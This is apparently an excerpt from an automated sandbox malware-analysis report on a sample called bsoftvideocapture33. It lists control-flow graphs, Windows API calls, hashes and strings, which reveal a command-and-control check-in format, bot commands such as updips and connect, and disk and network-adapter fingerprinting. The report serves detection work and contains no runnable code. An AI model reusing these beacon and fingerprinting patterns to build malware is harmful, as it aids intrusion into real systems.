61185->61187 61186->61183 61187->61183 61188->61183 61189->61183 61190->61183 61191->61183 61192->61183 61193->61183 61194->61183 61195->61183 61196->61183 61197->61183 61198->61183 61199->61183 61200->61183 61201->61183 61202->61183 61204 2c10900 GetProcessHeap HeapFree 61203->61204 61204->61205 61205->61183 61205->61203 61206 2c04100 GetProcessHeap HeapFree 61205->61206 61206->61205

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 229 2c05e5f-2c060ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2c042c7 GetTickCount call 2c059fa GetVersionExA call 2c13760 call 2c11fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c13760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c11fbc * 4 QueryPerformanceCounter Sleep call 2c11fbc * 2 call 2c13760 * 2 274 2c060f1-2c060f3 229->274 275 2c060f5-2c060fa 274->275 276 2c060fc-2c060fe 274->276 277 2c06105 Sleep 275->277 278 2c06100 276->278 279 2c0610b-2c06449 RtlEnterCriticalSection RtlLeaveCriticalSection 276->279 277->279 278->277 281 2c06465-2c0646f 279->281 282 2c0644b-2c06451 279->282 281->274 285 2c06475-2c06499 call 2c13760 call 2c0439c 281->285 283 2c06453-2c06455 282->283 284 2c06457-2c06464 call 2c0534d 282->284 283->281 284->281 285->274 292 2c0649f-2c064ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2c1134c 285->292 295 2c06514-2c0652c call 2c1134c 292->295 296 2c064cc-2c064db call 2c1134c 292->296 301 2c06532-2c06534 295->301 302 2c067d3-2c067e2 call 2c1134c 295->302 296->295 303 2c064dd-2c064ec call 2c1134c 296->303 301->302 305 2c0653a-2c065e5 call 2c11fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c13760 * 5 call 2c0439c * 2 301->305 310 2c067e4-2c067e6 302->310 311 2c06827-2c06836 call 2c1134c 302->311 303->295 313 2c064ee-2c064fd call 2c1134c 303->313 355 2c06622 305->355 356 2c065e7-2c065e9 305->356 310->311 314 2c067e8-2c06822 call 2c13760 RtlEnterCriticalSection RtlLeaveCriticalSection 310->314 324 2c06838-2c06841 call 2c05c12 call 2c05d20 311->324 325 2c0684b-2c0685a call 2c1134c 311->325 313->295 326 2c064ff-2c0650e call 2c1134c 313->326 314->274 338 2c06846 324->338 325->274 336 2c06860-2c06862 325->336 326->274 326->295 336->274 339 2c06868-2c06881 call 2c0439c 336->339 338->274 339->274 346 2c06887-2c06956 call 2c11428 call 2c01ba7 339->346 357 2c06958 call 2c0143f 346->357 358 2c0695d-2c0697e RtlEnterCriticalSection 346->358 363 2c06626-2c06654 call 2c11fbc call 2c13760 call 2c0439c 355->363 356->355 362 2c065eb-2c065fd call 2c1134c 356->362 357->358 360 2c06980-2c06987 358->360 361 2c0698a-2c069f1 RtlLeaveCriticalSection call 2c03c67 call 2c03d7e call 2c07340 358->361 360->361 383 2c069f7-2c06a39 call 2c0972a 361->383 384 2c06b59-2c06b6d call 2c08008 361->384 362->355 372 2c065ff-2c06620 call 2c0439c 362->372 381 2c06695-2c0669e call 2c11f84 363->381 382 2c06656-2c06665 call 2c125f6 363->382 372->363 393 2c067c1-2c067ce 381->393 394 2c066a4-2c066bc call 2c127c5 381->394 382->381 395 2c06667 382->395 396 2c06b23-2c06b54 call 2c073ef call 2c033b2 383->396 397 2c06a3f-2c06a46 383->397 384->274 393->274 407 2c066c8 394->407 408 2c066be-2c066c6 call 2c0873c 394->408 399 2c0666c-2c0667e call 2c11860 395->399 396->384 401 2c06a49-2c06a4e 397->401 414 2c06680 399->414 415 2c06683-2c06693 call 2c125f6 399->415 401->401 405 2c06a50-2c06a95 call 2c0972a 401->405 405->396 416 2c06a9b-2c06aa1 405->416 413 2c066ca-2c0676e call 2c09854 call 2c03863 call 2c05119 call 2c03863 call 2c09afa call 2c09c14 407->413 408->413 439 2c06770 call 2c0380b 413->439 440 2c06775-2c067a0 Sleep call 2c10900 413->440 414->415 415->381 415->399 421 2c06aa4-2c06aa9 416->421 421->421 423 2c06aab-2c06ae6 call 2c0972a 421->423 423->396 430 2c06ae8-2c06b22 call 2c0c11c 423->430 430->396 439->440 444 2c067a2-2c067ab call 2c04100 440->444 445 2c067ac-2c067ba 440->445 444->445 445->393 446 2c067bc call 2c0380b 445->446 446->393
                                                                                                                                        APIs
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(02C34FD0), ref: 02C05E93
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C05EAA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C05EB3
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C05EC2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C05EC5
                                                                                                                                        • GetTickCount.KERNEL32 ref: 02C05ED9
                                                                                                                                          • Part of subcall function 02C059FA: _malloc.LIBCMT ref: 02C05A08
                                                                                                                                        • GetVersionExA.KERNEL32(02C34E20), ref: 02C05F06
                                                                                                                                        • _memset.LIBCMT ref: 02C05F25
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F32
                                                                                                                                          • Part of subcall function 02C11FBC: __FF_MSGBANNER.LIBCMT ref: 02C11FD3
                                                                                                                                          • Part of subcall function 02C11FBC: __NMSG_WRITE.LIBCMT ref: 02C11FDA
                                                                                                                                          • Part of subcall function 02C11FBC: RtlAllocateHeap.NTDLL(00880000,00000000,00000001), ref: 02C11FFF
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F42
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F4D
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F58
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F63
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F6E
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F79
                                                                                                                                        • _malloc.LIBCMT ref: 02C05F85
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C05F9C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02C05FA5
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C05FB1
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02C05FB4
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C05FBF
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02C05FC2
                                                                                                                                        • _memset.LIBCMT ref: 02C05FD2
                                                                                                                                        • _memset.LIBCMT ref: 02C05FDE
                                                                                                                                        • _memset.LIBCMT ref: 02C05FEB
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C05FF9
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06006
                                                                                                                                        • _malloc.LIBCMT ref: 02C06027
                                                                                                                                        • _malloc.LIBCMT ref: 02C06035
                                                                                                                                        • _malloc.LIBCMT ref: 02C0603C
                                                                                                                                        • _malloc.LIBCMT ref: 02C0605D
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C06069
                                                                                                                                        • Sleep.KERNELBASE(00000000), ref: 02C06077
                                                                                                                                        • _malloc.LIBCMT ref: 02C06083
                                                                                                                                        • _malloc.LIBCMT ref: 02C06093
                                                                                                                                        • _memset.LIBCMT ref: 02C060A8
                                                                                                                                        • _memset.LIBCMT ref: 02C060B8
                                                                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 02C06105
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C06110
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06121
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                                                        • API String ID: 1856495841-1038016512
                                                                                                                                        • Opcode ID: d31c94d92147afa6ba2555e82d063cdccd04153856b11f7f1ef5d62ad0e47206
                                                                                                                                        • Instruction ID: f2de5cdc11df340ae013fbc3c23cfa5b5a8bb36f2d04465d231be4eaa22d9941
                                                                                                                                        • Opcode Fuzzy Hash: d31c94d92147afa6ba2555e82d063cdccd04153856b11f7f1ef5d62ad0e47206
                                                                                                                                        • Instruction Fuzzy Hash: 0E71C5B1D483909FE320AF34AC45B5B7BE8AF4A314F050E1DF68897281DBB949149FD6

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 658 2c0e9ac-2c0e9cf LoadLibraryA 659 2c0e9d5-2c0e9e3 GetProcAddress 658->659 660 2c0ea8f-2c0ea96 658->660 661 2c0ea88-2c0ea89 FreeLibrary 659->661 662 2c0e9e9-2c0e9f9 659->662 661->660 663 2c0e9fb-2c0ea07 GetAdaptersInfo 662->663 664 2c0ea09 663->664 665 2c0ea3f-2c0ea47 663->665 668 2c0ea0b-2c0ea12 664->668 666 2c0ea50-2c0ea55 665->666 667 2c0ea49-2c0ea4f call 2c126df 665->667 670 2c0ea83-2c0ea87 666->670 671 2c0ea57-2c0ea5a 666->671 667->666 672 2c0ea14-2c0ea18 668->672 673 2c0ea1c-2c0ea24 668->673 670->661 671->670 676 2c0ea5c-2c0ea61 671->676 672->668 677 2c0ea1a 672->677 674 2c0ea27-2c0ea2c 673->674 674->674 678 2c0ea2e-2c0ea3b call 2c0e6fb 674->678 679 2c0ea63-2c0ea6b 676->679 680 2c0ea6e-2c0ea79 call 2c127c5 676->680 677->665 678->665 679->680 680->670 685 2c0ea7b-2c0ea7e 680->685 685->663
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02C0E9C2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C0E9DB
                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02C0EA00
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02C0EA89
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                        • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                                                        • API String ID: 514930453-3114217049
                                                                                                                                        • Opcode ID: 1a03db7a072eae7699902309c9c2319e4e22748aef69f7f2528ab870d9f76221
                                                                                                                                        • Instruction ID: 18bcee5f8fa0b2ad5e98b7b31eac26e2020457b4ddd2cce0df3c4b26b2d97ed8
                                                                                                                                        • Opcode Fuzzy Hash: 1a03db7a072eae7699902309c9c2319e4e22748aef69f7f2528ab870d9f76221
                                                                                                                                        • Instruction Fuzzy Hash: 8C21E675E842199BDB14DBA9D8C07EEBFB9FF49710F1405A9E504E7280DB308A45CBA4

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 686 2c0e8a8-2c0e8d3 CreateFileA 687 2c0e9a4-2c0e9ab 686->687 688 2c0e8d9-2c0e8ee 686->688 689 2c0e8f1-2c0e913 DeviceIoControl 688->689 690 2c0e915-2c0e91d 689->690 691 2c0e94c-2c0e954 689->691 694 2c0e926-2c0e92b 690->694 695 2c0e91f-2c0e924 690->695 692 2c0e956-2c0e95c call 2c126df 691->692 693 2c0e95d-2c0e95f 691->693 692->693 697 2c0e961-2c0e964 693->697 698 2c0e99a-2c0e9a3 CloseHandle 693->698 694->691 699 2c0e92d-2c0e935 694->699 695->691 702 2c0e980-2c0e98d call 2c127c5 697->702 703 2c0e966-2c0e96f GetLastError 697->703 698->687 700 2c0e938-2c0e93d 699->700 700->700 704 2c0e93f-2c0e94b call 2c0e6fb 700->704 702->698 710 2c0e98f-2c0e995 702->710 703->698 705 2c0e971-2c0e974 703->705 704->691 705->702 708 2c0e976-2c0e97d 705->708 708->702 710->689
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02C0E8C7
                                                                                                                                        • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02C0E905
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C0E966
                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 02C0E99D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                                                        • String ID: \\.\PhysicalDrive0
                                                                                                                                        • API String ID: 4026078076-1180397377
                                                                                                                                        • Opcode ID: a4ca5ae9e44952b5f35ac9585a95dcd83602ea7e4dcfee0c886c3854a62631a8
                                                                                                                                        • Instruction ID: 6f4ac1e909c7c6992eee5d6080e7e25e54c19e9f36660531e97dd4698cba128a
                                                                                                                                        • Opcode Fuzzy Hash: a4ca5ae9e44952b5f35ac9585a95dcd83602ea7e4dcfee0c886c3854a62631a8
                                                                                                                                        • Instruction Fuzzy Hash: 7431A371D40229EBDB24CF98D884BEEBBB8EF45754F244569E505A3280DBB05B04CBD0

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 2c05dfb-2c05e01 1 2c05e03-2c05e1f 0->1 2 2c05e6d-2c05e85 0->2 3 2c05e21-2c05e31 1->3 4 2c05e6a 1->4 5 2c05e88-2c05ec5 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2->5 8 2c05e33-2c05e34 3->8 9 2c05e58-2c05e5e 3->9 4->2 6 2c05ecc-2c060ed GetTickCount call 2c059fa GetVersionExA call 2c13760 call 2c11fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c13760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c11fbc * 4 QueryPerformanceCounter Sleep call 2c11fbc * 2 call 2c13760 * 2 5->6 7 2c05ec7 call 2c042c7 5->7 53 2c060f1-2c060f3 6->53 7->6 8->5 10 2c05e36-2c05e56 8->10 10->9 54 2c060f5-2c060fa 53->54 55 2c060fc-2c060fe 53->55 56 2c06105 Sleep 54->56 57 2c06100 55->57 58 2c0610b-2c06449 RtlEnterCriticalSection RtlLeaveCriticalSection 55->58 56->58 57->56 60 2c06465-2c0646f 58->60 61 2c0644b-2c06451 58->61 60->53 64 2c06475-2c06499 call 2c13760 call 2c0439c 60->64 62 2c06453-2c06455 61->62 63 2c06457-2c06464 call 2c0534d 61->63 62->60 63->60 64->53 71 2c0649f-2c064ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2c1134c 64->71 74 2c06514-2c0652c call 2c1134c 71->74 75 2c064cc-2c064db call 2c1134c 71->75 80 2c06532-2c06534 74->80 81 2c067d3-2c067e2 call 2c1134c 74->81 75->74 82 2c064dd-2c064ec call 2c1134c 75->82 80->81 84 2c0653a-2c065e5 call 2c11fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c13760 * 5 call 2c0439c * 2 80->84 89 2c067e4-2c067e6 81->89 90 2c06827-2c06836 call 2c1134c 81->90 82->74 92 2c064ee-2c064fd call 2c1134c 82->92 134 2c06622 84->134 135 2c065e7-2c065e9 84->135 89->90 93 2c067e8-2c06822 call 2c13760 RtlEnterCriticalSection RtlLeaveCriticalSection 89->93 103 2c06838-2c06846 call 2c05c12 call 2c05d20 90->103 104 2c0684b-2c0685a call 2c1134c 90->104 92->74 105 2c064ff-2c0650e call 2c1134c 92->105 93->53 103->53 104->53 115 2c06860-2c06862 104->115 105->53 105->74 115->53 118 2c06868-2c06881 call 2c0439c 115->118 118->53 125 2c06887-2c06956 call 2c11428 call 2c01ba7 118->125 136 2c06958 call 2c0143f 125->136 137 2c0695d-2c0697e RtlEnterCriticalSection 125->137 142 2c06626-2c06654 call 2c11fbc call 2c13760 call 2c0439c 134->142 135->134 141 2c065eb-2c065fd call 2c1134c 135->141 136->137 139 2c06980-2c06987 137->139 140 2c0698a-2c069f1 RtlLeaveCriticalSection call 2c03c67 call 2c03d7e call 2c07340 137->140 139->140 162 2c069f7-2c06a39 call 2c0972a 140->162 163 2c06b59-2c06b6d call 2c08008 140->163 141->134 151 2c065ff-2c06620 call 2c0439c 141->151 160 2c06695-2c0669e call 2c11f84 142->160 161 2c06656-2c06665 call 2c125f6 142->161 151->142 172 2c067c1-2c067ce 160->172 173 2c066a4-2c066bc call 2c127c5 160->173 161->160 174 2c06667 161->174 175 2c06b23-2c06b54 call 2c073ef call 2c033b2 162->175 176 2c06a3f-2c06a46 162->176 163->53 172->53 186 2c066c8 173->186 187 2c066be-2c066c6 call 2c0873c 173->187 178 2c0666c-2c0667e call 2c11860 174->178 175->163 180 2c06a49-2c06a4e 176->180 193 2c06680 178->193 194 2c06683-2c06693 call 2c125f6 178->194 180->180 184 2c06a50-2c06a95 call 2c0972a 180->184 184->175 195 2c06a9b-2c06aa1 184->195 192 2c066ca-2c0676e call 2c09854 call 2c03863 call 2c05119 call 2c03863 call 2c09afa call 2c09c14 186->192 187->192 218 2c06770 call 2c0380b 192->218 219 2c06775-2c067a0 Sleep call 2c10900 192->219 193->194 194->160 194->178 200 2c06aa4-2c06aa9 195->200 200->200 202 2c06aab-2c06ae6 call 2c0972a 200->202 202->175 209 2c06ae8-2c06b22 call 2c0c11c 202->209 209->175 218->219 223 2c067a2-2c067ab call 2c04100 219->223 224 2c067ac-2c067ba 219->224 223->224 224->172 225 2c067bc call 2c0380b 224->225 225->172
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$Heap_memset$CriticalSection$AllocateProcess$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                                                        • API String ID: 219686520-1038016512
                                                                                                                                        • Opcode ID: 9328ceb6c4e80aa2b8d27e53af9c4e62f05c3cdfd8074c4bebd9764950f151b6
                                                                                                                                        • Instruction ID: e42d56f06b4d68f86d69accc815fdfeaa1cf141f4faf8c554f4191e645f97c0d
                                                                                                                                        • Opcode Fuzzy Hash: 9328ceb6c4e80aa2b8d27e53af9c4e62f05c3cdfd8074c4bebd9764950f151b6
                                                                                                                                        • Instruction Fuzzy Hash: 7D81F4B1D483809FD320AB34AC45B5BBBE5AF4A310F050D2DF688D7341DBB949159BD6

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 450 2c06410-2c06449 451 2c06465-2c0646f 450->451 452 2c0644b-2c06451 450->452 455 2c060f1-2c060f3 451->455 456 2c06475-2c06499 call 2c13760 call 2c0439c 451->456 453 2c06453-2c06455 452->453 454 2c06457-2c06464 call 2c0534d 452->454 453->451 454->451 457 2c060f5-2c060fa 455->457 458 2c060fc-2c060fe 455->458 456->455 468 2c0649f-2c064ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2c1134c 456->468 462 2c06105 Sleep 457->462 463 2c06100 458->463 464 2c0610b-2c0613a RtlEnterCriticalSection RtlLeaveCriticalSection 458->464 462->464 463->462 464->450 471 2c06514-2c0652c call 2c1134c 468->471 472 2c064cc-2c064db call 2c1134c 468->472 477 2c06532-2c06534 471->477 478 2c067d3-2c067e2 call 2c1134c 471->478 472->471 479 2c064dd-2c064ec call 2c1134c 472->479 477->478 481 2c0653a-2c065e5 call 2c11fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2c13760 * 5 call 2c0439c * 2 477->481 486 2c067e4-2c067e6 478->486 487 2c06827-2c0682d call 2c1134c 478->487 479->471 489 2c064ee-2c064fd call 2c1134c 479->489 531 2c06622 481->531 532 2c065e7-2c065e9 481->532 486->487 490 2c067e8-2c06822 call 2c13760 RtlEnterCriticalSection RtlLeaveCriticalSection 486->490 496 2c06832-2c06836 487->496 489->471 502 2c064ff-2c0650e call 2c1134c 489->502 490->455 500 2c06838-2c06841 call 2c05c12 call 2c05d20 496->500 501 2c0684b-2c0685a call 2c1134c 496->501 514 2c06846 500->514 501->455 512 2c06860-2c06862 501->512 502->455 502->471 512->455 515 2c06868-2c06881 call 2c0439c 512->515 514->455 515->455 522 2c06887-2c06956 call 2c11428 call 2c01ba7 515->522 533 2c06958 call 2c0143f 522->533 534 2c0695d-2c0697e RtlEnterCriticalSection 522->534 539 2c06626-2c06654 call 2c11fbc call 2c13760 call 2c0439c 531->539 532->531 538 2c065eb-2c065fd call 2c1134c 532->538 533->534 536 2c06980-2c06987 534->536 537 2c0698a-2c069f1 RtlLeaveCriticalSection call 2c03c67 call 2c03d7e call 2c07340 534->537 536->537 559 2c069f7-2c06a39 call 2c0972a 537->559 560 2c06b59-2c06b6d call 2c08008 537->560 538->531 548 2c065ff-2c06620 call 2c0439c 538->548 557 2c06695-2c0669e call 2c11f84 539->557 558 2c06656-2c06665 call 2c125f6 539->558 548->539 569 2c067c1-2c067ce 557->569 570 2c066a4-2c066bc call 2c127c5 557->570 558->557 571 2c06667 558->571 572 2c06b23-2c06b54 call 2c073ef call 2c033b2 559->572 573 2c06a3f-2c06a46 559->573 560->455 569->455 583 2c066c8 570->583 584 2c066be-2c066c6 call 2c0873c 570->584 575 2c0666c-2c0667e call 2c11860 571->575 572->560 577 2c06a49-2c06a4e 573->577 590 2c06680 575->590 591 2c06683-2c06693 call 2c125f6 575->591 577->577 581 2c06a50-2c06a95 call 2c0972a 577->581 581->572 592 2c06a9b-2c06aa1 581->592 589 2c066ca-2c0676e call 2c09854 call 2c03863 call 2c05119 call 2c03863 call 2c09afa call 2c09c14 583->589 584->589 615 2c06770 call 2c0380b 589->615 616 2c06775-2c06784 Sleep 589->616 590->591 591->557 591->575 597 2c06aa4-2c06aa9 592->597 597->597 599 2c06aab-2c06ae6 call 2c0972a 597->599 599->572 606 2c06ae8-2c06b22 call 2c0c11c 599->606 606->572 615->616 618 2c0678c-2c067a0 call 2c10900 616->618 620 2c067a2-2c067ab call 2c04100 618->620 621 2c067ac-2c067ba 618->621 620->621 621->569 622 2c067bc call 2c0380b 621->622 622->569
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 02C06105
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C06110
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06121
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                        • _memset.LIBCMT ref: 02C06481
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C064A4
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C064B5
                                                                                                                                        • _malloc.LIBCMT ref: 02C0653C
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C0654E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C0655A
                                                                                                                                        • _memset.LIBCMT ref: 02C06574
                                                                                                                                        • _memset.LIBCMT ref: 02C06583
                                                                                                                                        • _memset.LIBCMT ref: 02C06593
                                                                                                                                        • _memset.LIBCMT ref: 02C065A2
                                                                                                                                        • _memset.LIBCMT ref: 02C065B1
                                                                                                                                        • _malloc.LIBCMT ref: 02C0662B
                                                                                                                                        • _memset.LIBCMT ref: 02C0663C
                                                                                                                                        • _strtok.LIBCMT ref: 02C0665C
                                                                                                                                        • _swscanf.LIBCMT ref: 02C06673
                                                                                                                                        • _strtok.LIBCMT ref: 02C0668A
                                                                                                                                        • _free.LIBCMT ref: 02C06696
                                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 02C0677A
                                                                                                                                        • _memset.LIBCMT ref: 02C067F3
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C06800
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06812
                                                                                                                                          • Part of subcall function 02C0873C: __EH_prolog.LIBCMT ref: 02C08741
                                                                                                                                          • Part of subcall function 02C0873C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C087BC
                                                                                                                                          • Part of subcall function 02C0873C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C087DA
                                                                                                                                        • _sprintf.LIBCMT ref: 02C0689C
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C06961
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C06995
                                                                                                                                          • Part of subcall function 02C05C12: _malloc.LIBCMT ref: 02C05C20
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                                                                        • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                                                                        • API String ID: 3337033272-2823103634
                                                                                                                                        • Opcode ID: fa46e6caa032cbacd4e7569c47c2ea421ab80fdfd077056ecbae4e49edaeca87
                                                                                                                                        • Instruction ID: c8c10f2d4903ec51227dd69073231be0292c1e02a42b0e07300507456b6209ec
                                                                                                                                        • Opcode Fuzzy Hash: fa46e6caa032cbacd4e7569c47c2ea421ab80fdfd077056ecbae4e49edaeca87
                                                                                                                                        • Instruction Fuzzy Hash: BA1223716083819FE7349F24D881BAFBBE9AFC6718F14092DE589872C1DF719508DB92

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 626 401301-40135e FindResourceA 627 401360-401362 626->627 628 401367-40137d SizeofResource 626->628 629 401538-40153c 627->629 630 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 628->630 631 40137f-401381 628->631 636 401407-40140b 630->636 631->629 637 40140d-40141d 636->637 638 40141f-401428 GetTickCount 636->638 637->636 639 401491-401499 638->639 640 40142a-40142e 638->640 644 4014a2-4014a8 639->644 642 401430-401438 640->642 643 40148f 640->643 645 401441-401447 642->645 646 4014f0-401525 GlobalAlloc call 401000 643->646 644->646 647 4014aa-4014e8 644->647 649 401449-401485 645->649 650 40148d 645->650 653 40152a-401535 646->653 651 4014ea 647->651 652 4014ee 647->652 654 401487 649->654 655 40148b 649->655 650->640 651->652 652->644 653->629 654->655 655->645
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                                                                        • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindSizeof
                                                                                                                                        • String ID:
